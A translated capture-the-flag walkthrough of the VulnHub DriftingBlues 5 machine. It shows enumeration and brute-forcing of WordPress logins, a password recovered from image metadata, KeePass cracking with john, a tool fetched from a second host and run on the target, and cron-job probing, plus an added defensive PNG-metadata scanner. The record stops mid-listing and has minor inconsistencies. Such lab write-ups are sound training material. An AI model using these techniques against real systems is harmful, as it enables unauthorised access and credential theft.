Vulnhub DriftingBlues 5: detailed walkthrough of the target machine (obtaining a root shell)

DriftingBlues 5

Target machine information

Name: DriftingBlues: 5

Address:

https://download.vulnhub.com/driftingblues/driftingblues5_vh.ova

Identifying the IP address

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                        

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                           
 192.168.56.100  08:00:27:a6:7d:47      1      60  PCS Systemtechnik GmbH                                                                                   
 192.168.56.128  08:00:27:12:bf:76      1      60  PCS Systemtechnik GmbH                     

NMAP scan

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.128 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-19 02:50 EDT
Nmap scan report for 192.168.56.128
Host is up (0.00019s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.6.2
|_http-title: diary – Just another WordPress site
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:12:BF:76 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The NMAP scan results show that the target host has 2 open ports: 22 (SSH) and 80 (HTTP).

Get Foothold

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ curl http://192.168.56.128/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.128 Port 80</address>
</body></html>

The target host has no robots.txt file.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ nikto -h http://192.168.56.128
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.128
+ Target Hostname:    192.168.56.128
+ Target Port:        80
+ Start Time:         2023-05-19 02:53:37 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://192.168.56.128/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2023-05-19 02:54:42 (GMT-4) (65 seconds)

The nikto results show that the target host runs WordPress. Before scanning for WordPress usernames and plugins, check whether there are any other directories:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ gobuster dir -u http://192.168.56.128 -oN nmap_full_scan -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.bak,.js,.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.128
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              bak,txt,php,html,js
[+] Timeout:                 10s
===============================================================
2023/05/19 02:56:08 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/index.php            (Status: 301) [Size: 0] [--> http://192.168.56.128/]
/wp-content           (Status: 301) [Size: 321] [--> http://192.168.56.128/wp-content/]
/license.txt          (Status: 200) [Size: 19915]
/wp-login.php         (Status: 200) [Size: 6675]
/wp-includes          (Status: 301) [Size: 322] [--> http://192.168.56.128/wp-includes/]
/readme.html          (Status: 200) [Size: 7278]
/wp-trackback.php     (Status: 200) [Size: 135]
/wp-admin             (Status: 301) [Size: 319] [--> http://192.168.56.128/wp-admin/]
/xmlrpc.php           (Status: 405) [Size: 42]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/wp-signup.php        (Status: 302) [Size: 0] [--> http://192.168.56.128/wp-login.php?action=register]
/server-status        (Status: 403) [Size: 279]
Progress: 1322241 / 1323366 (99.91%)
===============================================================
2023/05/19 03:00:52 Finished
===============================================================

gobuster did not find any more useful directories or files.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ wpscan --url http://192.168.56.128 -e u,p
[+] abuzerkomurcu
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.56.128/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] satanic
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] gill
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] collins
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] gadd
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

wpscan enumerated the usernames (note: no vulnerable plugins were found).

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ wpscan --url http://192.168.56.128 -U abuzerkomurcu -P /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

The classic rockyou.txt dictionary did not crack anything. Since the target's pages carry a lot of content, the password may be somewhere in the page text, so use cewl to generate a dictionary from the site:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ cewl -d 3 http://192.168.56.128 -w dict 
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ wpscan --url http://192.168.56.128 -U users.dict -P dict
[!] Valid Combinations Found:
 | Username: gill, Password: interchangeable

Only gill's password was cracked. Logging in with it shows that gill is not an administrator user. In the media library there is an image that does not appear anywhere on the front-end pages, which is suspicious, so download it to the local Kali Linux machine.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ exiftool dblogo.png 
ExifTool Version Number         : 12.44
File Name                       : dblogo.png
Directory                       : .
File Size                       : 19 kB
File Modification Date/Time     : 2023:05:19 03:31:44-04:00
File Access Date/Time           : 2023:05:19 03:31:44-04:00
File Inode Change Date/Time     : 2023:05:19 03:31:44-04:00
File Permissions                : -rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 300
Image Height                    : 300
Bit Depth                       : 8
Color Type                      : RGB with Alpha
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
SRGB Rendering                  : Perceptual
Gamma                           : 2.2
Pixels Per Unit X               : 2835
Pixels Per Unit Y               : 2835
Pixel Units                     : meters
XMP Toolkit                     : Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39
Creator Tool                    : Adobe Photoshop CC 2018 (Windows)
Create Date                     : 2021:02:24 02:55:28+03:00
Metadata Date                   : 2021:02:24 02:55:28+03:00
Modify Date                     : 2021:02:24 02:55:28+03:00
Instance ID                     : xmp.iid:562b80d4-fe12-8541-ae0c-6a21e7859405
Document ID                     : adobe:docid:photoshop:7232d876-a1d0-044b-9604-08837143888b
Original Document ID            : xmp.did:5890be6c-649b-0248-af9b-19889727200c
Color Mode                      : RGB
ICC Profile Name                : sRGB IEC61966-2.1
Format                          : image/png
History Action                  : created, saved
History Instance ID             : xmp.iid:5890be6c-649b-0248-af9b-19889727200c, xmp.iid:562b80d4-fe12-8541-ae0c-6a21e7859405
History When                    : 2021:02:24 02:55:28+03:00, 2021:02:24 02:55:28+03:00
History Software Agent          : Adobe Photoshop CC 2018 (Windows), Adobe Photoshop CC 2018 (Windows)
History Changed                 : /
Text Layer Name                 : ssh password is 59583hello of course it is lowercase maybe not
Text Layer Text                 : ssh password is 59583hello of course it is lowercase maybe not :)
Document Ancestors              : adobe:docid:photoshop:871a8adf-5521-894c-8a18-2b27c91a893b
Image Size                      : 300x300
Megapixels                      : 0.090

exiftool reveals the SSH password in the image metadata; use it to log in over SSH:
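The leak above happens because Photoshop writes the document's text layers into the PNG's XMP metadata, and that metadata survives the upload. The scanner below is an added example (not part of the walkthrough) that parses PNG text chunks directly and flags password-like phrases, the kind of pre-publish check a site owner could run over the uploads directory. The sample PNG and its XMP text are constructed in memory, and SECRET_RE is an assumed pattern list.

```python
from __future__ import annotations
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
TEXT_CHUNKS = {b"tEXt", b"zTXt", b"iTXt"}
# Phrases worth flagging in image metadata (assumed list; extend it for your environment).
SECRET_RE = re.compile(r"(password|passwd|secret|api[_ -]?key|token)\s*(is|:|=)\s*(\S+)", re.I)

# Constructed XMP payload in the shape Photoshop emits for a text layer; the value is a dummy.
SAMPLE_XMP = ('<x:xmpmeta xmlns:x="adobe:ns:meta/"><rdf:Description '
              'photoshop:TextLayerText="ssh password is hunter2-demo of course it is lowercase"/>'
              '</x:xmpmeta>')


def _chunk(ctype: bytes, body: bytes) -> bytes:
    """Serialise one PNG chunk: 4-byte length, type, body, CRC32 over type+body."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_sample_png(xmp_text: str) -> bytes:
    """Construct a 1x1 RGBA PNG whose iTXt chunk carries the given XMP text."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 6, 0, 0, 0)  # 1x1, 8 bits, colour type 6 = RGBA
    pixel = b"\x00" + b"\x00\x00\x00\xff"                 # filter byte + one opaque pixel
    # iTXt: keyword\0, compression flag, method, language\0, translated keyword\0, text
    itxt = b"XML:com.adobe.xmp\x00\x00\x00\x00\x00" + xmp_text.encode("utf-8")
    return (PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"iTXt", itxt)
            + _chunk(b"IDAT", zlib.compress(pixel)) + _chunk(b"IEND", b""))


def _decode_text_chunk(ctype: bytes, body: bytes) -> tuple[str, str]:
    """Turn a tEXt/zTXt/iTXt body into (keyword, text), inflating if compressed."""
    keyword, _, rest = body.partition(b"\x00")
    if ctype == b"tEXt":
        text = rest
    elif ctype == b"zTXt":
        text = zlib.decompress(rest[1:])                  # rest[0] is the compression method
    else:                                                 # iTXt
        compressed = rest[:1] == b"\x01"
        _lang, _, rest = rest[2:].partition(b"\x00")      # skip flag + method, drop language tag
        _translated, _, text = rest.partition(b"\x00")
        if compressed:
            text = zlib.decompress(text)
    return keyword.decode("latin-1"), text.decode("utf-8", "replace")


def png_text_chunks(data: bytes) -> list[tuple[str, str]]:
    """Walk the chunk list, verifying each CRC, and collect every text chunk."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    found, pos = [], len(PNG_SIG)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc, = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            raise ValueError(f"CRC mismatch in {ctype!r} chunk at offset {pos}")
        if ctype in TEXT_CHUNKS:
            found.append(_decode_text_chunk(ctype, body))
        if ctype == b"IEND":
            break
        pos += 12 + length
    return found


def find_metadata_secrets(data: bytes) -> list[tuple[str, str]]:
    """Return (chunk keyword, matched phrase) for every secret-looking string."""
    return [(keyword, m.group(0))
            for keyword, text in png_text_chunks(data)
            for m in SECRET_RE.finditer(text)]


if __name__ == "__main__":
    for keyword, phrase in find_metadata_secrets(build_sample_png(SAMPLE_XMP)):
        print(f"[!] {keyword}: {phrase}")
```

To check a real upload, pass `open("dblogo.png", "rb").read()` to `find_metadata_secrets`; stripping the flagged chunks (or re-encoding the image without metadata) before publishing removes the leak.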

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ ssh gill@192.168.56.128
The authenticity of host '192.168.56.128 (192.168.56.128)' can't be established.
ED25519 key fingerprint is SHA256:P07e9iTTwbyQae7lGtYu8i4toAyBfYkXY9/kw/dyv/4.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:35: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.128' (ED25519) to the list of known hosts.
gill@192.168.56.128's password: 
Linux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
gill@driftingblues:~$ id
uid=1000(gill) gid=1000(gill) groups=1000(gill)
gill@driftingblues:~$ ls -alh
total 24K
drwxr-xr-x 4 gill gill 4.0K May 19 02:33 .
drwxr-xr-x 4 root root 4.0K Feb 24  2021 ..
drwx------ 3 gill gill 4.0K May 19 02:33 .gnupg
-rwx------ 1 gill gill 2.0K Feb 24  2021 keyfile.kdbx
drwx------ 2 gill gill 4.0K Feb 24  2021 .ssh
-r-x------ 1 gill gill 1.8K Jan  3  2021 user.txt
gill@driftingblues:~$ cat user.txt 
flag 1/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░░░░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░░▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█



gill@driftingblues:~$ 

Privilege Escalation

In gill's home directory there is a file keyfile.kdbx, which is certainly going to be useful; download it to Kali Linux.

KDBX files are the data files created by KeePass Password Safe, commonly referred to as KeePass password databases. Each one holds an encrypted database of passwords; once the user has set a master password, the entries can only be viewed by unlocking the database with that master password. KDBX files are useful for securely storing personal login credentials for email accounts, e-commerce sites, Windows, FTP sites and other purposes.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ wget http://192.168.56.128:8000/keyfile.kdbx            
--2023-05-19 03:36:26--  http://192.168.56.128:8000/keyfile.kdbx
Connecting to 192.168.56.128:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2030 (2.0K) [application/octet-stream]
Saving to: ‘keyfile.kdbx’

keyfile.kdbx                            100%[============================================================================>]   1.98K  --.-KB/s    in 0s      

2023-05-19 03:36:26 (217 MB/s) - ‘keyfile.kdbx’ saved [2030/2030]


┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ keepass2john keyfile.kdbx > keyfile_hash

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt keyfile_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
porsiempre       (keyfile)     
1g 0:00:01:23 DONE (2023-05-19 03:38) 0.01196g/s 82.44p/s 82.44c/s 82.44C/s winston1..palomita
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Use the recovered password to open the file on the website below:

https://app.keeweb.info/

This yields 5 password-like strings, but none of them is the root password:

2real4surreal
buddyretard
closet313
exalted
fracturedocean
zakkwylde

gill@driftingblues:/tmp$ wget http://192.168.56.230:8000/pspy64
--2023-05-19 02:45:48--  http://192.168.56.230:8000/pspy64
Connecting to 192.168.56.230:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64                                  100%[============================================================================>]   2.96M  --.-KB/s    in 0.03s   

2023-05-19 02:45:48 (102 MB/s) - ‘pspy64’ saved [3104768/3104768]

gill@driftingblues:/tmp$ chmod +x pspy64
gill@driftingblues:/tmp$ ./pspy64 
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2023/05/19 02:46:01 CMD: UID=0     PID=1694   | /bin/bash /root/key.sh 
2023/05/19 02:46:01 CMD: UID=0     PID=1693   | /bin/sh -c /root/key.sh 
2023/05/19 02:46:01 CMD: UID=0     PID=1692   | /usr/sbin/CRON -f 
2023/05/19 02:46:01 CMD: UID=1000  PID=1685   | ./pspy64 
2023/05/19 02:46:01 CMD: UID=0     PID=1665   | 
2023/05/19 02:46:01 CMD: UID=0     PID=1585   | 
2023/05/19 02:46:01 CMD: UID=1000  PID=1545   | -bash 
2023/05/19 02:46:01 CMD: UID=1000  PID=1544   | sshd: gill@pts/0     
2023/05/19 02:46:01 CMD: UID=1000  PID=1531   | (sd-pam) 
2023/05/19 02:46:01 CMD: UID=1000  PID=1530   | /lib/systemd/systemd --user 
2023/05/19 02:46:01 CMD: UID=0     PID=1527   | sshd: gill [priv]    
2023/05/19 02:46:01 CMD: UID=33    PID=1238   | /usr/sbin/apache2 -k start 
2023/05/19 02:46:01 CMD: UID=33    PID=1202   | /usr/sbin/apache2 -k start 
2023/05/19 02:46:01 CMD: UID=33    PID=1027   | /usr/sbin/apache2 -k start 
2023/05/19 02:46:01 CMD: UID=0     PID=949    | 
2023/05/19 02:46:01 CMD: UID=33    PID=846    | /usr/sbin/apache2 -k start 
2023/05/19 02:46:01 CMD: UID=33    PID=806    | /usr/sbin/apache2 -k start 
2023/05/19 02:46:01 CMD: UID=33    PID=805    | /usr/sbin/apache2 -k start 
2023/05/19 02:46:01 CMD: UID=33    PID=777    | /usr/sbin/apache2 -k start 
2023/05/19 02:46:01 CMD: UID=33    PID=743    | /usr/sbin/apache2 -k start 
2023/05/19 02:46:01 CMD: UID=33    PID=541    | /usr/sbin/apache2 -k start 
2023/05/19 02:46:01 CMD: UID=33    PID=540    | /usr/sbin/apache2 -k start 
2023/05/19 02:46:01 CMD: UID=0     PID=524    | /usr/sbin/apache2 -k start 
2023/05/19 02:46:01 CMD: UID=0     PID=492    | /usr/sbin/sshd -D 
2023/05/19 02:46:01 CMD: UID=106   PID=488    | /usr/sbin/mysqld 
2023/05/19 02:46:01 CMD: UID=0     PID=409    | /sbin/agetty -o -p -- \u --noclear tty1 linux 
2023/05/19 02:46:01 CMD: UID=0     PID=384    | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3                                                                                                                         
2023/05/19 02:46:01 CMD: UID=104   PID=354    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only 
2023/05/19 02:46:01 CMD: UID=0     PID=353    | /lib/systemd/systemd-logind 
2023/05/19 02:46:01 CMD: UID=0     PID=352    | /usr/sbin/cron -f 
2023/05/19 02:46:01 CMD: UID=0     PID=347    | /usr/sbin/rsyslogd -n -iNONE 
2023/05/19 02:46:01 CMD: UID=101   PID=341    | /lib/systemd/systemd-timesyncd 
2023/05/19 02:46:01 CMD: UID=0     PID=328    | 
2023/05/19 02:46:01 CMD: UID=0     PID=327    | 
2023/05/19 02:46:01 CMD: UID=0     PID=326    | 
2023/05/19 02:46:01 CMD: UID=0     PID=325    | 
2023/05/19 02:46:01 CMD: UID=0     PID=321    | 
2023/05/19 02:46:01 CMD: UID=0     PID=320    | 
2023/05/19 02:46:01 CMD: UID=0     PID=275    | 
2023/05/19 02:46:01 CMD: UID=0     PID=274    | 
2023/05/19 02:46:01 CMD: UID=0     PID=237    | /lib/systemd/systemd-udevd 
2023/05/19 02:46:01 CMD: UID=0     PID=215    | /lib/systemd/systemd-journald 
2023/05/19 02:46:01 CMD: UID=0     PID=187    | 
2023/05/19 02:46:01 CMD: UID=0     PID=186    | 
2023/05/19 02:46:01 CMD: UID=0     PID=184    | 
2023/05/19 02:46:01 CMD: UID=0     PID=153    | 
2023/05/19 02:46:01 CMD: UID=0     PID=117    | 
2023/05/19 02:46:01 CMD: UID=0     PID=116    | 
2023/05/19 02:46:01 CMD: UID=0     PID=114    | 
2023/05/19 02:46:01 CMD: UID=0     PID=113    | 
2023/05/19 02:46:01 CMD: UID=0     PID=111    | 
2023/05/19 02:46:01 CMD: UID=0     PID=110    | 
2023/05/19 02:46:01 CMD: UID=0     PID=108    | 
2023/05/19 02:46:01 CMD: UID=0     PID=106    | 
2023/05/19 02:46:01 CMD: UID=0     PID=59     | 
2023/05/19 02:46:01 CMD: UID=0     PID=50     | 
2023/05/19 02:46:01 CMD: UID=0     PID=49     | 
2023/05/19 02:46:01 CMD: UID=0     PID=48     | 
2023/05/19 02:46:01 CMD: UID=0     PID=30     | 
2023/05/19 02:46:01 CMD: UID=0     PID=29     | 
2023/05/19 02:46:01 CMD: UID=0     PID=28     | 
2023/05/19 02:46:01 CMD: UID=0     PID=27     | 
2023/05/19 02:46:01 CMD: UID=0     PID=26     | 
2023/05/19 02:46:01 CMD: UID=0     PID=25     | 
2023/05/19 02:46:01 CMD: UID=0     PID=24     | 
2023/05/19 02:46:01 CMD: UID=0     PID=23     | 
2023/05/19 02:46:01 CMD: UID=0     PID=22     | 
2023/05/19 02:46:01 CMD: UID=0     PID=21     | 
2023/05/19 02:46:01 CMD: UID=0     PID=20     | 
2023/05/19 02:46:01 CMD: UID=0     PID=19     | 
2023/05/19 02:46:01 CMD: UID=0     PID=18     | 
2023/05/19 02:46:01 CMD: UID=0     PID=17     | 
2023/05/19 02:46:01 CMD: UID=0     PID=16     | 
2023/05/19 02:46:01 CMD: UID=0     PID=15     | 
2023/05/19 02:46:01 CMD: UID=0     PID=14     | 
2023/05/19 02:46:01 CMD: UID=0     PID=12     | 
2023/05/19 02:46:01 CMD: UID=0     PID=11     | 
2023/05/19 02:46:01 CMD: UID=0     PID=10     | 
2023/05/19 02:46:01 CMD: UID=0     PID=9      | 
2023/05/19 02:46:01 CMD: UID=0     PID=8      | 
2023/05/19 02:46:01 CMD: UID=0     PID=6      | 
2023/05/19 02:46:01 CMD: UID=0     PID=4      | 
2023/05/19 02:46:01 CMD: UID=0     PID=3      | 
2023/05/19 02:46:01 CMD: UID=0     PID=2      | 
2023/05/19 02:46:01 CMD: UID=0     PID=1      | /sbin/init 
2023/05/19 02:46:01 CMD: UID=0     PID=1696   | /bin/bash /root/key.sh 

After uploading the pspy64 tool to the target host, one process turns out to be executed once every minute:

2023/05/19 02:46:01 CMD: UID=0     PID=1693   | /bin/sh -c /root/key.sh

The root of the filesystem contains /keyfolder. Judging by the name of the /root/key.sh script, it should be key-related, with /keyfolder as the key directory, but at the moment that directory is empty. So create a file named after each of the password-like strings cracked earlier, one at a time, and watch whether the directory changes; the created file has to be removed before the next attempt. Honestly, this vulnerability was very hard to find, and I followed other people's approach here.

gill@driftingblues:/keyfolder$ cd /tmp
gill@driftingblues:/tmp$ touch 2real4surreal
gill@driftingblues:/tmp$ mv 2real4surreal /keyfolder/
gill@driftingblues:/tmp$ ls -alh /keyfolder/*
-rw-r--r-- 1 gill gill 0 May 19 03:01 /keyfolder/2real4surreal
-rw-r--r-- 1 gill gill 0 May 19 02:55 /keyfolder/buddyretard
-rw-r--r-- 1 gill gill 0 May 19 02:55 /keyfolder/closet313
-rw-r--r-- 1 gill gill 0 May 19 02:55 /keyfolder/exalted
-rw-r--r-- 1 gill gill 0 May 19 02:55 /keyfolder/fracturedocean
-rw-r--r-- 1 gill gill 0 May 19 02:56 /keyfolder/zakkwylde
gill@driftingblues:/tmp$ ls -alh /keyfolder/
total 8.0K
drwx---rwx  2 root root 4.0K May 19 03:01 .
drwxr-xr-x 19 root root 4.0K Feb 24  2021 ..
-rw-r--r--  1 gill gill    0 May 19 03:01 2real4surreal
-rw-r--r--  1 gill gill    0 May 19 02:55 buddyretard
-rw-r--r--  1 gill gill    0 May 19 02:55 closet313
-rw-r--r--  1 gill gill    0 May 19 02:55 exalted
-rw-r--r--  1 gill gill    0 May 19 02:55 fracturedocean
-rw-r--r--  1 gill gill    0 May 19 02:56 zakkwylde
gill@driftingblues:/tmp$ rm -rf /keyfolder/*
gill@driftingblues:/tmp$ touch buddyretard
gill@driftingblues:/tmp$ ls -alh /keyfolder/
total 8.0K
drwx---rwx  2 root root 4.0K May 19 03:02 .
drwxr-xr-x 19 root root 4.0K Feb 24  2021 ..
gill@driftingblues:/tmp$ mv buddyretard /keyfolder/
gill@driftingblues:/tmp$ ls -alh /keyfolder/
total 8.0K
drwx---rwx  2 root root 4.0K May 19 03:03 .
drwxr-xr-x 19 root root 4.0K Feb 24  2021 ..
-rw-r--r--  1 gill gill    0 May 19 03:02 buddyretard
gill@driftingblues:/tmp$ rm -rf /keyfolder/*
gill@driftingblues:/tmp$ touch closet313
gill@driftingblues:/tmp$ mv closet313 /keyfolder/
gill@driftingblues:/tmp$ ls -alh /keyfolder/
total 8.0K
drwx---rwx  2 root root 4.0K May 19 03:03 .
drwxr-xr-x 19 root root 4.0K Feb 24  2021 ..
-rw-r--r--  1 gill gill    0 May 19 03:03 closet313
gill@driftingblues:/tmp$ rm -rf /keyfolder/*
gill@driftingblues:/tmp$ touch exalted
gill@driftingblues:/tmp$ mv exalted /keyfolder/
gill@driftingblues:/tmp$ ls -alh /keyfolder/
total 8.0K
drwx---rwx  2 root root 4.0K May 19 03:04 .
drwxr-xr-x 19 root root 4.0K Feb 24  2021 ..
-rw-r--r--  1 gill gill    0 May 19 03:03 exalted
gill@driftingblues:/tmp$ rm -rf /keyfolder/*
gill@driftingblues:/tmp$ touch fracturedocean
gill@driftingblues:/tmp$ mv fracturedocean /keyfolder/
gill@driftingblues:/tmp$ ls -alh /keyfolder/
total 8.0K
